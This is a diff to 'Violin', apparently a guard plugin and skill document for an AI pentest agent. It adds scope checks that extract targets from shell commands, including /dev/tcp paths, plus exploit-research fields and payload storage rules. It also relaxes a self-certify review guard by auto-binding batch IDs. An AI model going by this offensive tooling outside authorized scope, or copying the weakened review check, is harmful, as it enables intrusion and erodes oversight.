template = template[:comment_start] + template[comment_end + 3 :]
|
||||
# Keep any header content before first hypothesis
|
||||
header_end = template.find("### H-")
|
||||
if header_end == -1:
|
||||
|
||||
@@ -16,6 +16,7 @@ import os
|
||||
import re
|
||||
import subprocess
|
||||
import sys
|
||||
import tempfile
|
||||
from dataclasses import dataclass
|
||||
from pathlib import Path
|
||||
|
||||
@@ -28,6 +29,19 @@ __all__ = [
|
||||
]
|
||||
|
||||
|
||||
def _project_python(repo_root: Path) -> str:
|
||||
"""Prefer the repository virtualenv when a profile runtime invokes the CLI."""
|
||||
|
||||
candidates = (
|
||||
repo_root / ".venv" / "Scripts" / "python.exe",
|
||||
repo_root / ".venv" / "bin" / "python",
|
||||
)
|
||||
for candidate in candidates:
|
||||
if candidate.exists():
|
||||
return str(candidate)
|
||||
return sys.executable
|
||||
|
||||
|
||||
@dataclass
|
||||
class ReleaseCheckResult:
|
||||
errors: list[str] = None
|
||||
@@ -173,10 +187,12 @@ def check_release() -> ReleaseCheckResult:
|
||||
|
||||
# 4. Heavy checks (ruff + pytest), opt-out via env.
|
||||
if os.environ.get("VIOLIN_CHECK_RELEASE_SKIP_HEAVY") != "1":
|
||||
repo_root = str(root.parents[1])
|
||||
repo_path = root.parents[1]
|
||||
repo_root = str(repo_path)
|
||||
python = _project_python(repo_path)
|
||||
try:
|
||||
ruff = subprocess.run(
|
||||
[sys.executable, "-m", "ruff", "check", "."],
|
||||
[python, "-m", "ruff", "check", "."],
|
||||
cwd=repo_root,
|
||||
capture_output=True,
|
||||
text=True,
|
||||
@@ -190,16 +206,17 @@ def check_release() -> ReleaseCheckResult:
|
||||
except FileNotFoundError:
|
||||
result.add_warning("ruff not installed; skipped")
|
||||
try:
|
||||
basetemp = tempfile.mkdtemp(prefix=".pytest-release-", dir=repo_path / "engagements")
|
||||
pytest = subprocess.run(
|
||||
[
|
||||
sys.executable,
|
||||
python,
|
||||
"-m",
|
||||
"pytest",
|
||||
"-q",
|
||||
"-p",
|
||||
"no:cacheprovider",
|
||||
"--basetemp",
|
||||
str(Path(repo_root) / "engagements" / ".pytest-release"),
|
||||
basetemp,
|
||||
],
|
||||
cwd=repo_root,
|
||||
capture_output=True,
|
||||
|
||||
@@ -8,6 +8,12 @@ import re
|
||||
from pathlib import Path
|
||||
|
||||
from . import command, execution, hypotheses, ptt, state
|
||||
|
||||
|
||||
def _eng_path(eng_dir: str) -> Path:
|
||||
return state._eng_dir(eng_dir)
|
||||
|
||||
|
||||
from .adapters import search_exploit
|
||||
|
||||
|
||||
@@ -39,19 +45,19 @@ def handle_check_command(a, **kwargs):
|
||||
def handle_record_ptt(a, **kwargs):
|
||||
try:
|
||||
eng_dir = a["eng_dir"]
|
||||
doc = ptt.parse_ptt(Path(eng_dir) / "state" / "ptt.md")
|
||||
doc = ptt.parse_ptt(_eng_path(eng_dir) / "state" / "ptt.md")
|
||||
pending = state.get_pending_sync(eng_dir)
|
||||
task = a.get("id")
|
||||
note = (a.get("note") or "").strip()
|
||||
status = a.get("status", "x")
|
||||
status = a.get("status", "[~]")
|
||||
|
||||
# --- Self-certify guard (audit P0-sync) ---------------------------------
|
||||
# A review only unlocks the batch when it demonstrably corresponds to the
|
||||
# work that was just executed. Four checks, all fail-closed:
|
||||
if not pending:
|
||||
raise ValueError("no pending execution batch to review")
|
||||
if not task or not note:
|
||||
raise ValueError("task id and non-empty review note required")
|
||||
if not pending:
|
||||
return _start_ptt_task(_eng_path(eng_dir) / "state" / "ptt.md", doc, task, status, note)
|
||||
# 1. reviewed ID must match the active [~] task — never review a different row
|
||||
validation = ptt.validate_ptt(doc)
|
||||
if validation.errors:
|
||||
@@ -68,13 +74,13 @@ def handle_record_ptt(a, **kwargs):
|
||||
raise ValueError(
|
||||
f"reviewed task {task!r} is not the active task; resolve the active task first"
|
||||
)
|
||||
# 2. the batch id must be carried in the note — proves this review belongs to this batch
|
||||
# 2. Bind the review to the current batch ourselves. Requiring an
|
||||
# operator to copy an opaque ID creates avoidable friction; the guard
|
||||
# already holds the pending state and records an explicit marker before
|
||||
# it unlocks anything.
|
||||
batch_id = pending.get("batch_id")
|
||||
if batch_id and batch_id not in note:
|
||||
raise ValueError(
|
||||
f"review note must carry the batch_id {batch_id!r}; "
|
||||
"use the batch id returned by violin_exec / violin_exec_burst"
|
||||
)
|
||||
note = f"{note} [reviewed-batch:{batch_id}]"
|
||||
# 3. every pending command must already be recorded in history.md
|
||||
for item in pending.get("commands") or []:
|
||||
cmd = item.get("command")
|
||||
@@ -84,7 +90,7 @@ def handle_record_ptt(a, **kwargs):
|
||||
"the batch must finish before review"
|
||||
)
|
||||
|
||||
ptt.update_task(Path(eng_dir) / "state" / "ptt.md", task, status, note)
|
||||
ptt.update_task(_eng_path(eng_dir) / "state" / "ptt.md", task, status, note)
|
||||
state.mark_ptt_reviewed(eng_dir, task, note)
|
||||
# 4. no commands may run after review until sync-done clears the batch
|
||||
return _json("ok", task_id=task, batch_id=pending.get("batch_id"))
|
||||
@@ -92,6 +98,26 @@ def handle_record_ptt(a, **kwargs):
|
||||
return _json("error", error=str(e))
|
||||
|
||||
|
||||
def _start_ptt_task(ptt_path: Path, tasks, task_id: str, status: str, note: str) -> str:
|
||||
"""Arm one untouched, phase-bound task before the first target command."""
|
||||
|
||||
if status != "[~]":
|
||||
raise ValueError("without a pending batch, only [~] may start a PTT task")
|
||||
if ptt.find_active_task(tasks):
|
||||
raise ValueError("an active PTT task already exists; review its pending batch first")
|
||||
selected = next((item for item in tasks if item.id == task_id), None)
|
||||
if selected is None:
|
||||
raise ValueError(f"PTT task {task_id!r} not found")
|
||||
if selected.status != "[ ]":
|
||||
raise ValueError(f"PTT task {task_id!r} must be [ ] before it can be started")
|
||||
try:
|
||||
phase = ptt.normalize_phase(selected.phase)
|
||||
except ValueError as exc:
|
||||
raise ValueError(f"PTT task {task_id!r} must sit below a valid Phase heading") from exc
|
||||
ptt.update_task(ptt_path, task_id, status, note)
|
||||
return _json("ok", task_id=task_id, phase=phase.value, task_started=True)
|
||||
|
||||
|
||||
def handle_record_hypothesis(a, **kwargs):
|
||||
try:
|
||||
eng_dir = a["eng_dir"]
|
||||
@@ -99,7 +125,7 @@ def handle_record_hypothesis(a, **kwargs):
|
||||
# Pass in-scope hosts so the record is scope-bound (audit P1-hyp).
|
||||
in_scope = _scope_hosts(eng_dir)
|
||||
h = hypotheses.update_hypothesis(
|
||||
Path(eng_dir) / "hypotheses.md", in_scope_hosts=in_scope, **fields
|
||||
_eng_path(eng_dir) / "hypotheses.md", in_scope_hosts=in_scope, **fields
|
||||
)
|
||||
return _json("ok", hypothesis=h.to_dict())
|
||||
except Exception as e:
|
||||
@@ -114,7 +140,7 @@ def _scope_hosts(eng_dir: str) -> set[str] | None:
|
||||
"""
|
||||
import yaml
|
||||
|
||||
scope_path = Path(eng_dir) / "scope" / "scope.yaml"
|
||||
scope_path = _eng_path(eng_dir) / "scope" / "scope.yaml"
|
||||
if not scope_path.exists():
|
||||
return None
|
||||
try:
|
||||
@@ -171,7 +197,9 @@ def handle_exec(a, **kwargs):
|
||||
)
|
||||
return _json(status, executed=False, **gate)
|
||||
try:
|
||||
active_task = ptt.find_active_task(ptt.parse_ptt(Path(a["eng_dir"]) / "state" / "ptt.md"))
|
||||
active_task = ptt.find_active_task(
|
||||
ptt.parse_ptt(_eng_path(a["eng_dir"]) / "state" / "ptt.md")
|
||||
)
|
||||
r = execution.execute(
|
||||
command=a["command"],
|
||||
eng_dir=a["eng_dir"],
|
||||
@@ -289,8 +317,8 @@ def handle_exec_burst(a, **kwargs):
|
||||
cwd=cwd,
|
||||
label=label,
|
||||
ptt_task_id=(
|
||||
ptt.find_active_task(ptt.parse_ptt(Path(eng_dir) / "state" / "ptt.md")).id
|
||||
if ptt.find_active_task(ptt.parse_ptt(Path(eng_dir) / "state" / "ptt.md"))
|
||||
ptt.find_active_task(ptt.parse_ptt(_eng_path(eng_dir) / "state" / "ptt.md")).id
|
||||
if ptt.find_active_task(ptt.parse_ptt(_eng_path(eng_dir) / "state" / "ptt.md"))
|
||||
else ""
|
||||
),
|
||||
)
|
||||
@@ -318,7 +346,7 @@ def handle_exec_burst(a, **kwargs):
|
||||
def handle_target(a, **kwargs):
|
||||
import yaml
|
||||
|
||||
p = Path(a["eng_dir"]) / "scope" / "scope.yaml"
|
||||
p = _eng_path(a["eng_dir"]) / "scope" / "scope.yaml"
|
||||
d = yaml.safe_load(p.read_text())
|
||||
ips = d.get("targets", {}).get("ip_addresses", [])
|
||||
if ips:
|
||||
|
||||
@@ -7,6 +7,7 @@ from __future__ import annotations
|
||||
|
||||
import contextlib
|
||||
import json
|
||||
import os
|
||||
import time
|
||||
from datetime import UTC, datetime
|
||||
from pathlib import Path
|
||||
@@ -53,8 +54,20 @@ _COUNTS_FILE = "counts.json"
|
||||
_LOCK_SUFFIX = ".lock"
|
||||
|
||||
|
||||
def _eng_root() -> Path:
|
||||
"""Return Violin's stable profile/repository root for relative paths."""
|
||||
override = os.environ.get("VIOLIN_ENG_ROOT", "").strip()
|
||||
if override:
|
||||
return Path(override).expanduser().resolve()
|
||||
# <profile>/plugins/violin_guard/core/state.py -> <profile>
|
||||
return Path(__file__).resolve().parents[3]
|
||||
|
||||
|
||||
def _eng_dir(eng_dir: str | Path) -> Path:
|
||||
return Path(eng_dir).resolve()
|
||||
path = Path(eng_dir).expanduser()
|
||||
if not path.is_absolute():
|
||||
path = _eng_root() / path
|
||||
return path.resolve()
|
||||
|
||||
|
||||
def _state_dir(eng_dir: str | Path) -> Path:
|
||||
@@ -191,6 +204,7 @@ def mark_pending_sync(
|
||||
ptt_task_id: str,
|
||||
) -> None:
|
||||
path = _sync_path(eng_dir)
|
||||
|
||||
def mark(data: dict[str, Any]) -> None:
|
||||
old = data.get("pending") or {}
|
||||
commands = list(old.get("commands") or [])
|
||||
@@ -204,7 +218,8 @@ def mark_pending_sync(
|
||||
"batch_id": old.get("batch_id") or datetime.now(UTC).strftime("%Y%m%d%H%M%S"),
|
||||
"commands": commands,
|
||||
"phase": phase,
|
||||
"created_at": old.get("created_at") or datetime.now(UTC).isoformat().replace("+00:00", "Z"),
|
||||
"created_at": old.get("created_at")
|
||||
or datetime.now(UTC).isoformat().replace("+00:00", "Z"),
|
||||
"ptt_task_id": task_id,
|
||||
# Appending work always invalidates a previous review. A review can
|
||||
# only certify the exact command set visible at that moment.
|
||||
@@ -216,6 +231,7 @@ def mark_pending_sync(
|
||||
|
||||
def clear_pending_sync(eng_dir: str | Path) -> None:
|
||||
path = _sync_path(eng_dir)
|
||||
|
||||
def clear(data: dict[str, Any]) -> None:
|
||||
data.pop("pending", None)
|
||||
data["credit"] = DEFAULT_SYNC_CREDIT
|
||||
@@ -235,6 +251,7 @@ def get_pending_sync(eng_dir: str | Path) -> dict | None:
|
||||
|
||||
def mark_ptt_reviewed(eng_dir: str | Path, task_id: str, note: str) -> None:
|
||||
path = _sync_path(eng_dir)
|
||||
|
||||
def mark(data: dict[str, Any]) -> None:
|
||||
pending = data.get("pending")
|
||||
if not pending:
|
||||
@@ -287,6 +304,7 @@ def _heartbeat_path(eng_dir: str | Path) -> Path:
|
||||
|
||||
def set_heartbeat_pending(eng_dir: str | Path, reason: str) -> None:
|
||||
path = _heartbeat_path(eng_dir)
|
||||
|
||||
def mark(data: dict[str, Any]) -> None:
|
||||
data["pending"] = True
|
||||
data["reason"] = reason
|
||||
@@ -297,6 +315,7 @@ def set_heartbeat_pending(eng_dir: str | Path, reason: str) -> None:
|
||||
|
||||
def clear_heartbeat_pending(eng_dir: str | Path) -> None:
|
||||
path = _heartbeat_path(eng_dir)
|
||||
|
||||
def clear(data: dict[str, Any]) -> None:
|
||||
data["pending"] = False
|
||||
data.pop("reason", None)
|
||||
@@ -333,6 +352,7 @@ def read_counts(eng_dir: str | Path) -> dict[str, int]:
|
||||
|
||||
def tick_command(eng_dir: str | Path) -> int:
|
||||
path = _counts_path(eng_dir)
|
||||
|
||||
def tick(data: dict[str, Any]) -> int:
|
||||
data["commands"] = data.get("commands", 0) + 1
|
||||
return data["commands"]
|
||||
@@ -342,6 +362,7 @@ def tick_command(eng_dir: str | Path) -> int:
|
||||
|
||||
def tick_message(eng_dir: str | Path) -> int:
|
||||
path = _counts_path(eng_dir)
|
||||
|
||||
def tick(data: dict[str, Any]) -> int:
|
||||
data["messages"] = data.get("messages", 0) + 1
|
||||
return data["messages"]
|
||||
@@ -355,6 +376,7 @@ def record_ok_check(
|
||||
phase: str,
|
||||
) -> None:
|
||||
path = _counts_path(eng_dir)
|
||||
|
||||
def record(data: dict[str, Any]) -> None:
|
||||
data["last_check"] = {
|
||||
"command": command,
|
||||
|
||||
@@ -0,0 +1,248 @@
|
||||
"""Target extraction and scope enforcement for guarded commands.
|
||||
|
||||
This module owns the networking-aware parsing boundary. It deliberately uses
|
||||
only Python's standard library: ``shlex`` for commands, ``urllib.parse`` for
|
||||
URL authorities, and ``ipaddress`` for IP/CIDR validation.
|
||||
"""
|
||||
|
||||
from __future__ import annotations
|
||||
|
||||
import ipaddress
|
||||
import mimetypes
|
||||
import shlex
|
||||
from dataclasses import dataclass, field
|
||||
from pathlib import Path
|
||||
from typing import Any
|
||||
from urllib.parse import urlsplit
|
||||
|
||||
Network = ipaddress.IPv4Network | ipaddress.IPv6Network
|
||||
|
||||
_PATH_VALUE_FLAGS = {
|
||||
"-o",
|
||||
"-oA",
|
||||
"-oG",
|
||||
"-oN",
|
||||
"-oX",
|
||||
"--log-file",
|
||||
"--outfile",
|
||||
"--output",
|
||||
"--output-dir",
|
||||
}
|
||||
_REDIRECTION_OPERATORS = {">", ">>", "2>", "2>>", "&>"}
|
||||
_DEV_NETWORK_PREFIXES = ("/dev/tcp/", "/dev/udp/")
|
||||
|
||||
|
||||
@dataclass
|
||||
class TargetCheckResult:
|
||||
errors: list[str] = field(default_factory=list)
|
||||
warnings: list[str] = field(default_factory=list)
|
||||
|
||||
|
||||
def extract_target_candidates(command: str) -> list[str]:
|
||||
"""Return ordered, unique network targets found in a shell command."""
|
||||
|
||||
candidates: list[str] = []
|
||||
skip_path_value = False
|
||||
for token in _command_tokens(command):
|
||||
if skip_path_value:
|
||||
skip_path_value = False
|
||||
continue
|
||||
if token in _PATH_VALUE_FLAGS:
|
||||
skip_path_value = True
|
||||
continue
|
||||
if token in _REDIRECTION_OPERATORS or _is_path_option(token):
|
||||
continue
|
||||
|
||||
if token.rstrip(";, ").endswith("()"):
|
||||
continue
|
||||
candidate = token.strip("'\"(),;")
|
||||
if _looks_like_local_path(candidate) and not _is_network_path(candidate):
|
||||
continue
|
||||
host = _parse_target_token(candidate)
|
||||
if host:
|
||||
candidates.append(host)
|
||||
return list(dict.fromkeys(candidates))
|
||||
|
||||
|
||||
def normalise_target(value: str) -> str:
|
||||
"""Return a comparable host for a URL, host:port, or bare target."""
|
||||
|
||||
raw = value.strip()
|
||||
try:
|
||||
parsed = urlsplit(raw if "://" in raw else f"//{raw}")
|
||||
if parsed.hostname:
|
||||
return parsed.hostname.lower()
|
||||
except ValueError:
|
||||
pass
|
||||
return raw.lower()
|
||||
|
||||
|
||||
def check_scope_targets(scope_path: Path, command: str) -> TargetCheckResult:
|
||||
"""Block excluded or out-of-scope IP/CIDR targets in ``command``."""
|
||||
|
||||
result = TargetCheckResult()
|
||||
scope = _read_scope(scope_path)
|
||||
if scope is None:
|
||||
return result
|
||||
|
||||
allowed = _scope_hosts(scope, "targets")
|
||||
excluded = _scope_hosts(scope, "exclusions")
|
||||
allowed_networks = _scope_networks(scope, "targets")
|
||||
excluded_networks = _scope_networks(scope, "exclusions")
|
||||
for candidate in extract_target_candidates(command):
|
||||
if candidate in excluded or _matches_network(candidate, excluded_networks):
|
||||
result.errors.append(f"excluded target {candidate} must not be touched")
|
||||
elif candidate in allowed or _matches_network(candidate, allowed_networks):
|
||||
continue
|
||||
elif _is_ip_network(candidate):
|
||||
result.errors.append(f"out-of-scope target {candidate} (not present in scope.yaml)")
|
||||
else:
|
||||
result.warnings.append(
|
||||
f"host {candidate} is not present in scope.yaml; verify authorization"
|
||||
)
|
||||
return result
|
||||
|
||||
|
||||
def _command_tokens(command: str) -> list[str]:
|
||||
"""Tokenize a command and one quoted nested-command level."""
|
||||
|
||||
tokens = _split_shell_words(command)
|
||||
return tokens + [
|
||||
nested for token in tokens if " " in token for nested in _split_shell_words(token)
|
||||
]
|
||||
|
||||
|
||||
def _split_shell_words(value: str) -> list[str]:
|
||||
try:
|
||||
return shlex.split(value, posix=True)
|
||||
except ValueError:
|
||||
return value.split()
|
||||
|
||||
|
||||
def _parse_target_token(token: str) -> str | None:
|
||||
dev_host = _dev_network_host(token)
|
||||
if dev_host:
|
||||
return dev_host
|
||||
|
||||
raw = token.strip().rstrip("/.,;)")
|
||||
if not raw:
|
||||
return None
|
||||
unbracketed = raw[1:-1] if raw.startswith("[") and raw.endswith("]") else raw
|
||||
try:
|
||||
if "/" in unbracketed:
|
||||
return str(ipaddress.ip_network(unbracketed, strict=False)).lower()
|
||||
return str(ipaddress.ip_address(unbracketed)).lower()
|
||||
except ValueError:
|
||||
pass
|
||||
|
||||
try:
|
||||
parsed = urlsplit(raw if "://" in raw else f"//{raw}")
|
||||
except ValueError:
|
||||
return None
|
||||
return _valid_hostname(parsed.hostname) if parsed.hostname else None
|
||||
|
||||
|
||||
def _dev_network_host(token: str) -> str | None:
|
||||
normalized = token.strip("'\"(),;")
|
||||
prefix = next((item for item in _DEV_NETWORK_PREFIXES if normalized.startswith(item)), None)
|
||||
if prefix is None:
|
||||
return None
|
||||
host, separator, port = normalized.removeprefix(prefix).partition("/")
|
||||
if not separator or "/" in port or not port.isdigit() or not 0 < int(port) < 65536:
|
||||
return None
|
||||
return _parse_target_token(host)
|
||||
|
||||
|
||||
def _valid_hostname(value: str) -> str | None:
|
||||
host = value.strip().rstrip(".").lower()
|
||||
labels = host.split(".")
|
||||
if not host or len(host) > 253 or len(labels) < 2:
|
||||
return None
|
||||
if any(not label or len(label) > 63 for label in labels):
|
||||
return None
|
||||
if any(label.startswith("-") or label.endswith("-") for label in labels):
|
||||
return None
|
||||
if any(
|
||||
not all(char.isascii() and (char.isalnum() or char == "-") for char in label)
|
||||
for label in labels
|
||||
):
|
||||
return None
|
||||
return host
|
||||
|
||||
|
||||
def _is_path_option(token: str) -> bool:
|
||||
return any(token.startswith(f"{flag}=") for flag in _PATH_VALUE_FLAGS)
|
||||
|
||||
|
||||
def _is_network_path(token: str) -> bool:
|
||||
return token.startswith(_DEV_NETWORK_PREFIXES) or "://" in token
|
||||
|
||||
|
||||
def _looks_like_local_path(token: str) -> bool:
|
||||
normalized = token.replace("\\", "/")
|
||||
return (
|
||||
normalized.startswith(("/", "./", "../", "~/", "$", "%"))
|
||||
or "/" in normalized
|
||||
or mimetypes.guess_type(normalized)[0] is not None
|
||||
)
|
||||
|
||||
|
||||
def _read_scope(path: Path) -> dict[str, Any] | None:
|
||||
if not path.exists():
|
||||
return None
|
||||
try:
|
||||
import yaml
|
||||
|
||||
data = yaml.safe_load(path.read_text(encoding="utf-8")) or {}
|
||||
except Exception:
|
||||
return None
|
||||
return data if isinstance(data, dict) else None
|
||||
|
||||
|
||||
def _scope_hosts(scope: dict[str, Any], section: str) -> set[str]:
|
||||
values = scope.get(section, {}) or {}
|
||||
if section == "exclusions":
|
||||
return {normalise_target(value) for value in _values(values)}
|
||||
keys = ("ip_addresses", "in_scope_urls", "urls", "domains", "hostnames", "roles")
|
||||
return {normalise_target(value) for key in keys for value in _values(values.get(key, []))}
|
||||
|
||||
|
||||
def _scope_networks(scope: dict[str, Any], section: str) -> list[Network]:
|
||||
values = scope.get(section, {}) or {}
|
||||
networks: list[Network] = []
|
||||
for key in ("ip_addresses", "cidrs"):
|
||||
for value in _values(values.get(key, [])):
|
||||
try:
|
||||
networks.append(ipaddress.ip_network(value, strict=False))
|
||||
except ValueError:
|
||||
continue
|
||||
return networks
|
||||
|
||||
|
||||
def _values(value: Any):
|
||||
if isinstance(value, dict):
|
||||
for nested in value.values():
|
||||
yield from _values(nested)
|
||||
elif isinstance(value, list):
|
||||
for nested in value:
|
||||
yield from _values(nested)
|
||||
elif value is not None:
|
||||
yield str(value)
|
||||
|
||||
|
||||
def _matches_network(candidate: str, networks: list[Network]) -> bool:
|
||||
try:
|
||||
network = ipaddress.ip_network(candidate, strict=False)
|
||||
except ValueError:
|
||||
return False
|
||||
return any(
|
||||
network.version == allowed.version and network.subnet_of(allowed) for allowed in networks
|
||||
)
|
||||
|
||||
|
||||
def _is_ip_network(value: str) -> bool:
|
||||
try:
|
||||
ipaddress.ip_network(value, strict=False)
|
||||
except ValueError:
|
||||
return False
|
||||
return True
|
||||
@@ -23,7 +23,7 @@ CHECK_COMMAND_SCHEMA = {
|
||||
}
|
||||
|
||||
RECORD_PTT_SCHEMA = {
|
||||
"description": "Update a PTT row (status/note).",
|
||||
"description": "Start one untouched [ ] PTT task with [~], or review the active task after a completed batch. A non-empty note is required; reviewed batches are bound automatically.",
|
||||
"parameters": {
|
||||
"type": "object",
|
||||
"properties": {
|
||||
@@ -53,6 +53,27 @@ RECORD_HYPOTHESIS_SCHEMA = {
|
||||
"vuln_class": {"type": "string"},
|
||||
"rationale": {"type": "string"},
|
||||
"evidence": {"type": "string"},
|
||||
"cve_research": {
|
||||
"type": "string",
|
||||
"description": "Required before exploitation: online CVE/advisory query, source, and outcome. Truthful no-results/not-applicable/unavailable outcomes are allowed.",
|
||||
},
|
||||
"exploit_research": {
|
||||
"type": "string",
|
||||
"description": "Required before exploitation: online PoC/exploit query, source, and outcome. Truthful no-results/unavailable outcomes are allowed.",
|
||||
},
|
||||
"test_command": {
|
||||
"type": "string",
|
||||
"description": "Exact syntax tested, including argument order",
|
||||
},
|
||||
"test_response": {"type": "string", "description": "Exact decisive response or error"},
|
||||
"verification_status": {
|
||||
"type": "string",
|
||||
"enum": ["syntax_confirmed", "syntax_uncertain", "not_implemented", "not_tested"],
|
||||
},
|
||||
"rejection_reason": {
|
||||
"type": "string",
|
||||
"description": "Why a rejected hypothesis is safe to stop pursuing",
|
||||
},
|
||||
},
|
||||
"required": ["eng_dir", "service", "port"],
|
||||
"additionalProperties": True,
|
||||
@@ -204,7 +225,10 @@ NMAP_SCHEMA = {
|
||||
"properties": {
|
||||
**_ADAPTER_COMMON,
|
||||
"scan_type": {"type": "string", "enum": ["-sV", "-sC", "-sCV", "-sn", "-Pn"]},
|
||||
"ports": {"type": "string"},
|
||||
"ports": {
|
||||
"type": "string",
|
||||
"description": "Port specification, e.g. 80,443 or 1-65535; do not include -p",
|
||||
},
|
||||
},
|
||||
"required": ["eng_dir", "scope", "phase", "target"],
|
||||
"additionalProperties": False,
|
||||
|
||||
@@ -56,7 +56,7 @@ def cmd_validate_scope(args: argparse.Namespace) -> int:
|
||||
|
||||
|
||||
def cmd_check_skill_loaded(args: argparse.Namespace) -> int:
|
||||
result = command.check_skill_load(Path(args.eng_dir), args.session_id, mandatory=True)
|
||||
result = command.check_skill_load(state._eng_dir(args.eng_dir), args.session_id, mandatory=True)
|
||||
return _print_result(result)
|
||||
|
||||
|
||||
@@ -70,7 +70,7 @@ def cmd_record_ptt(args: argparse.Namespace) -> int:
|
||||
from plugins.violin_guard.core import ptt
|
||||
|
||||
ptt.update_task(
|
||||
Path(args.eng_dir) / "state" / "ptt.md",
|
||||
state._eng_dir(args.eng_dir) / "state" / "ptt.md",
|
||||
args.id,
|
||||
args.status,
|
||||
args.note or "",
|
||||
@@ -129,7 +129,7 @@ def cmd_eng_root(args: argparse.Namespace) -> int:
|
||||
from plugins.violin_guard.core import state
|
||||
|
||||
eng_dir = args.eng_dir_option or args.eng_dir
|
||||
eng_root = state._eng_dir(eng_dir) if eng_dir else state._eng_dir("")
|
||||
eng_root = state._eng_root()
|
||||
print(f"ENG_ROOT={eng_root}")
|
||||
if eng_dir:
|
||||
resolved = state._eng_dir(eng_dir)
|
||||
|
||||
+10
-4
@@ -49,6 +49,8 @@ violin/ # ← repo root
|
||||
|
||||
The agent operates as the **Pentest Lead** with supervised autonomy only after scope approval, phase approval, and guard checks.
|
||||
|
||||
**Artifact-path rule:** local scripts, payload files, and downloaded PoCs belong under `$ENG_DIR/exploits/`; local tool output belongs under `$ENG_DIR/evidence/<phase>/`. Never create local artifacts in `/tmp`. `/tmp` is permitted only when a payload explicitly creates a temporary file **on the remote target**; label that distinction in the command note.
|
||||
|
||||
**Available capabilities:**
|
||||
- **`terminal`** — direct shell access for running tools, scripts, and commands on the target environment
|
||||
- **`web`** (`web_search`, `web_extract`) — research: CVE lookup, exploit search, OSINT, documentation, PoC search
|
||||
@@ -103,7 +105,7 @@ The phase workflow is mandatory for the entire session, including long, compress
|
||||
- `violin_target` resolves the current in-scope target from `scope.yaml`; use it instead of hardcoding reset-prone IPs.
|
||||
- `violin_exec` is the single-command authorize, execute, and evidence boundary for target interaction.
|
||||
- `violin_exec_status` reads a tracked execution receipt; `violin_exec_cancel` cancels only its tracked process group.
|
||||
- `violin_exec_burst` is the batch gate for exploit/race iterations; it records every completed command, then requires an explicit PTT review/update.
|
||||
- `violin_exec_burst` is the batch gate for exploit/race iterations. Keep one EXPLOITATION PTT task active while adapting up to 20 pre-approved commands; it records every completed command and requires one explicit PTT review/update only when the bounded burst ends.
|
||||
- `violin_nmap`, `violin_httpx`, `violin_nuclei`, and `violin_ffuf` build typed commands and delegate to `violin_exec`.
|
||||
- `violin_search_exploit` searches the local ExploitDB index only; it never downloads or executes a candidate.
|
||||
- `violin_exec` / `violin_exec_burst` append exact command history themselves. Do not spend model calls recreating command history, and do not treat automatic history as proof that the PTT progressed.
|
||||
@@ -112,7 +114,7 @@ The phase workflow is mandatory for the entire session, including long, compress
|
||||
- `violin_heartbeat_done` clears the periodic review lock after re-reading this skill and reviewing engagement files.
|
||||
|
||||
0. **Bootstrap gate** — at session start, after `/goal set`, or after context compression that loses track of state, verify the engagement is bootstrapped: `python $HOME/.hermes/profiles/violin/scripts/violin_guard.py check-bootstrap --eng-dir "$ENG_DIR"`. Exit `0` = proceed. Exit `1` = **STOP and run `playbooks/scoping.md §0`** (creates `$ENG_DIR/`, `scope/scope.yaml`, `state/ptt.md`, `hypotheses.md`, `state/history.md`). Exit `2` = fix the warning, then proceed. This gate is non-negotiable: no `curl`, `nmap`, `browser_navigate`, or other target-touching tool call is allowed until exit 0.
|
||||
0.1. **Skill-load gate** — after reading this skill, create `state/.skill-loaded-<session-id>` containing `skill-loaded: <timestamp or label>`, then verify it with `check-skill-loaded --eng-dir "$ENG_DIR" --session-id "<session-id>"`. Missing marker = **BLOCK**. CTF bootstrap creates it when `--session-id` is supplied.
|
||||
0.1. **Skill-load gate** — after reading this skill, create `state/.skill-loaded-<session-id>` containing `skill-loaded: <timestamp or label>`, then verify it with `check-skill-loaded --eng-dir "$ENG_DIR" --session-id "<session-id>"`. Missing marker = **BLOCK**. If the marker exists but belongs to another session, create the canonical marker for the current session and re-run the check; do not silently rely on a stale marker. CTF bootstrap creates it when `--session-id` is supplied.
|
||||
1. Check/update `todo` with a single active `phase-gate` item named for the current phase.
|
||||
2. Confirm an approved `$ENG_DIR/scope/scope.yaml` exists before touching any target. If it does not, remain in SCOPING and ask via `clarify`. Verify with `python $HOME/.hermes/profiles/violin/scripts/violin_guard.py validate-scope --scope $ENG_DIR/scope/scope.yaml` (exit 0 required).
|
||||
For an authorized HTB/CTF lab, `init-engagement --ctf --host <ip> --session-id <id> "$ENG_DIR"` creates a ready-to-test scope, active RECON PTT row, and skill marker.
|
||||
@@ -120,7 +122,7 @@ The phase workflow is mandatory for the entire session, including long, compress
|
||||
```bash
|
||||
python $HOME/.hermes/profiles/violin/scripts/violin_guard.py record-ptt --eng-dir "$ENG_DIR" --id PT-XXX --status "[~]" --note "starting task"
|
||||
```
|
||||
The guard hard-blocks target execution when there is no unambiguous active task. The executor never changes this row or its `*Last updated*` timestamp. After each bounded batch, review the results and explicitly call `violin_record_ptt` with `[~]`, `[x]`, `[!]`, or `[-]` plus a truthful result summary, then call `violin_sync_done`.
|
||||
With no pending batch, this is the one permitted PTT start transition. The guard hard-blocks target execution when there is no unambiguous active task or the task sits under another phase heading. The executor never changes this row or its `*Last updated*` timestamp. After each bounded batch, review the results and explicitly call `violin_record_ptt` with `[~]`, `[x]`, `[!]`, or `[-]` plus a truthful result summary, then call `violin_sync_done`.
|
||||
4. **Command history is executor-owned** — `violin_exec` appends every completed target command automatically. The standalone `record-history` CLI is administrative repair/import only, not part of the model workflow. Inspect recent history before a new batch to avoid repeats.
|
||||
5. Re-read this skill or the active playbook after context compression, `/resume`, or any uncertainty about the workflow. **Also read back evidence and hypotheses:** `read_file path="$ENG_DIR/hypotheses.md"` and `search_files path="$ENG_DIR/evidence" pattern="<target>" target="files"` to restore investigation state.
|
||||
6. Validate target-touching commands before execution:
|
||||
@@ -148,7 +150,7 @@ The phase workflow is mandatory for the entire session, including long, compress
|
||||
- RETROSPECTIVE → `references/retrospective.md`
|
||||
8. Before exploit validation, re-check the vuln playbook's `## Stop Conditions` and `## Blocked Actions`.
|
||||
9. If the requested action conflicts with the current phase, pause and reconcile phase/scope first.
|
||||
